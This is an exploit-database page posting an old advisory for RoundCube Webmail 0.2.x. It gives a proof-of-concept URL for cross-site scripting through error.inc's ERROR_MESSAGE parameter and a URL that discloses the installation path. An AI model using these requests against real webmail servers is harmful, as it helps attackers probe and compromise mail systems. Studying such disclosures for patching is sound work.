[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RoundCube Webmail Multiple Vulerabilities

Author
j4ck
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10617
Category
web applications
Date add
06-01-2010
Platform
unsorted
=========================================
RoundCube Webmail Multiple Vulerabilities
=========================================

# Exploit Title: RoundCube Webmail XSS Voulerability
# Date: 6.01.2010
# Author: j4ck & Globus from elitehackers.pl
# Software Link: Software link : http://roundcube.net/download
# Version: 0.2.X , | possible voulerability in higher versions.
# Tested on: *
# Code :
 
XSS:
 
http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123
 
We can get FPD or roundcube installation path via:
 
http://www.[somesite.com]/webmail/program/steps/settings/identities.inc



#  0day.today [2024-11-15]  #